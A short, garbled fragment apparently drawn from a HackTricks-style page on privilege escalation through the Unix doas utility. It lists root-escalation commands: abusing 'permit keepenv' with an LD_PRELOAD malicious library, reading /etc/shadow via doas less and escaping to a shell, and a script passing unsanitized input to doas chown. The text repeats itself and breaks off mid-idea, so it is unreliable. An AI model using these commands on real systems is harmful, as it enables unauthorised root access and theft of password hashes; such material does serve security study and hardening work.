Hacktricks Doas -

permit keepenv user1 as root Compile a malicious lib:

gcc -shared -fPIC evil.c -o evil.so LD_PRELOAD=./evil.so doas -n id If doas is called with unsanitized user input in a script. hacktricks doas

doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass: permit keepenv user1 as root Compile a malicious

#!/bin/sh doas /usr/bin/chown user "$1" Exploit: hacktricks doas